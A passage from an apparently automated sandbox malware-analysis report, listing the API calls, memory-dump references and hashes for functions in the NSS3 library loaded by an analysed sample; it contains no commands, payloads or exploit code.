                                                                                                                                                                                                                            • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CBC7060
                                                                                                                                                                                                                            • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CBC7087
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE062,00000000), ref: 6CBC70AF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2108637330-0
                                                                                                                                                                                                                            • Opcode ID: 125c32ba3ab29159ba078e04b2a941f56115b91411b529dd94210842c6ce7a19
                                                                                                                                                                                                                            • Instruction ID: dbc4ce0889716bf02d73cb0850ca48c7a530b1cd223ed97e84ba4eefc04f507a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 125c32ba3ab29159ba078e04b2a941f56115b91411b529dd94210842c6ce7a19
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46A1F7B1B082C19BEB009F24DC85F7B32A4DB8131CF24893AE959DBA91E775D845C753
                                                                                                                                                                                                                            Function 6CBDAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBDADB1
                                                                                                                                                                                                                              • Part of subcall function 6CBBBE30: SECOID_FindOID_Util.NSS3(6CB7311B,00000000,?,6CB7311B,?), ref: 6CBBBE44
                                                                                                                                                                                                                            • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CBDADF4
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CBDAE08
                                                                                                                                                                                                                              • Part of subcall function 6CBBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC918D0,?), ref: 6CBBB095
                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBDAE25
                                                                                                                                                                                                                            • PL_FreeArenaPool.NSS3 ref: 6CBDAE63
                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CBDAE4D
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: TlsGetValue.KERNEL32(?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4C97
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CB0
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CC9
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBDAE93
                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CBDAECC
                                                                                                                                                                                                                            • PL_FreeArenaPool.NSS3 ref: 6CBDAEDE
                                                                                                                                                                                                                            • PL_FinishArenaPool.NSS3 ref: 6CBDAEE6
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBDAEF5
                                                                                                                                                                                                                            • PL_FinishArenaPool.NSS3 ref: 6CBDAF16
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                            • String ID: security
                                                                                                                                                                                                                            • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                            • Opcode ID: ecea14e7e0557eae322bfe799908813723b4c6767160191abe1d69ead70a8c1e
                                                                                                                                                                                                                            • Instruction ID: fba2e9c0b11dc359c5e129a967a4584c97557f954de2c02f7aa9bd0289733b07
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecea14e7e0557eae322bfe799908813723b4c6767160191abe1d69ead70a8c1e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2541F6B6904281A7EB215A249C45BBE32A8EF4171CF250525E815D6F81FB39A648CBD3
                                                                                                                                                                                                                            Function 6CBF5CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBF2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CBF2A28,00000060,00000001), ref: 6CBF2BF0
                                                                                                                                                                                                                              • Part of subcall function 6CBF2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CBF2A28,00000060,00000001), ref: 6CBF2C07
                                                                                                                                                                                                                              • Part of subcall function 6CBF2BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CBF2A28,00000060,00000001), ref: 6CBF2C1E
                                                                                                                                                                                                                              • Part of subcall function 6CBF2BE0: free.MOZGLUE(?,00000000,00000000,?,6CBF2A28,00000060,00000001), ref: 6CBF2C4A
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5D0F
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5D4E
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5D62
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5D85
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5D99
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5DFA
                                                                                                                                                                                                                            • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5E33
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CBF5E3E
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CBF5E47
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5E60
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CBF5E78
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,6CBFAAD4), ref: 6CBF5EB9
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,6CBFAAD4), ref: 6CBF5EF0
                                                                                                                                                                                                                            • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CBF5F3D
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CBF5F4B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4273776295-0
                                                                                                                                                                                                                            • Opcode ID: bee2a79f14a03ee26db3f3bf5e4ff1ddce25b5a2868cc830c5b765028b4982a3
                                                                                                                                                                                                                            • Instruction ID: 8fa933a4615b0186595796494ef2a3d3916e1f49cce121cb1f8bbf734a1e8110
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bee2a79f14a03ee26db3f3bf5e4ff1ddce25b5a2868cc830c5b765028b4982a3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C71BFB4A00B419FD700CF24D884A96B7F5FF89308F148529E82E97B11EB31F959CB96
                                                                                                                                                                                                                            Function 6CB78DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?), ref: 6CB78E22
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB78E36
                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CB78E4F
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,?,?,?), ref: 6CB78E78
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CB78E9B
                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CB78EAC
                                                                                                                                                                                                                            • PL_ArenaAllocate.NSS3(?,?), ref: 6CB78EDE
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CB78EF0
                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CB78F00
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB78F0E
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CB78F39
                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CB78F4A
                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CB78F5B
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CB78F72
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CB78F82
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1569127702-0
                                                                                                                                                                                                                            • Opcode ID: 3944a395663dd44b29386b2fb468ed181e79509ffac1eea40e35a55814f0da44
                                                                                                                                                                                                                            • Instruction ID: 21883437eef8ebe721bfdc1afa60105f64fe53ac635bdfc516af5bcb68cf86f5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3944a395663dd44b29386b2fb468ed181e79509ffac1eea40e35a55814f0da44
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE51D5B2E002159FDB209E68CC849AEBB79EF55358B154529EC28AB700E732ED4587F1
                                                                                                                                                                                                                            Function 6CAEDC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CAEDD56
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6CAEDD7C
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CAEDE67
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6CAEDEC4
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAEDECD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 2339628231-598938438
                                                                                                                                                                                                                            • Opcode ID: ae7fd79a145eadec33c1f979c5cd2d48126b548e8ee8c53bb992d0652e1bc722
                                                                                                                                                                                                                            • Instruction ID: 5edc20073c0bceb0ec47b462f6764229990fa88fb2a24b12fefd0b3e913a5288
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae7fd79a145eadec33c1f979c5cd2d48126b548e8ee8c53bb992d0652e1bc722
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DA1C571A042419FC710DF29C480A6AB7F5EFC9308F19892DF8898BB51E731E895DBD1
                                                                                                                                                                                                                            Function 6CBAEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?), ref: 6CBAEE0B
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBAEEE1
                                                                                                                                                                                                                              • Part of subcall function 6CBA1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CBA1D7E
                                                                                                                                                                                                                              • Part of subcall function 6CBA1D50: EnterCriticalSection.KERNEL32(?), ref: 6CBA1D8E
                                                                                                                                                                                                                              • Part of subcall function 6CBA1D50: PR_Unlock.NSS3(?), ref: 6CBA1DD3
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBAEE51
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBAEE65
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBAEEA2
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBAEEBB
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBAEED0
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBAEF48
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBAEF68
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBAEF7D
                                                                                                                                                                                                                            • PK11_DoesMechanism.NSS3(?,?), ref: 6CBAEFA4
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBAEFDA
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CBAF055
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBAF060
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2524771861-0
                                                                                                                                                                                                                            • Opcode ID: 87cb32effcfd3066c6b32dad1ed47f0081925d66b7e100002d0b713977ab4a0b
                                                                                                                                                                                                                            • Instruction ID: d0af7d4be675a8b131d989f8d23788597ec71d946b033ae9f2a839448578ed38
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87cb32effcfd3066c6b32dad1ed47f0081925d66b7e100002d0b713977ab4a0b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 668182B1A04289AFDF00DFA5DC85ADE7BB5FF08318F140024E949A7711E731E965CBA2
                                                                                                                                                                                                                            Function 6CB74CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PK11_SignatureLen.NSS3(?), ref: 6CB74D80
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000000), ref: 6CB74D95
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CB74DF2
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB74E2C
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CB74E43
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CB74E58
                                                                                                                                                                                                                            • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CB74E85
                                                                                                                                                                                                                            • DER_Encode_Util.NSS3(?,?,6CCC05A4,00000000), ref: 6CB74EA7
                                                                                                                                                                                                                            • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CB74F17
                                                                                                                                                                                                                            • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CB74F45
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB74F62
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CB74F7A
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB74F89
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB74FC8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2843999940-0
                                                                                                                                                                                                                            • Opcode ID: 1f7e98269068fba740d14c75d2578301b8b86ada65d67a8ba33f8b6492c0994b
                                                                                                                                                                                                                            • Instruction ID: b801cbb09c328256ea4e1f7c7764fbaf1a26846074c5efeea0edaa2c2107b73d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f7e98269068fba740d14c75d2578301b8b86ada65d67a8ba33f8b6492c0994b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51819F71A083419FEB21CF28D840B6BB7E4EB84359F148529FD6CDB641E730E9058FA2
                                                                                                                                                                                                                            Function 6CBB5C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6CBB5C9B
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6CBB5CF4
                                                                                                                                                                                                                            • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CBB5CFD
                                                                                                                                                                                                                            • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6CBB5D42
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6CBB5D4E
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBB5D78
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CBB5E18
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBB5E5E
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBB5E72
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBB5E8B
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CBAF854
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CBAF868
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CBAF882
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: free.MOZGLUE(04C483FF,?,?), ref: 6CBAF889
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CBAF8A4
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CBAF8AB
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CBAF8C9
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: free.MOZGLUE(280F10EC,?,?), ref: 6CBAF8D0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
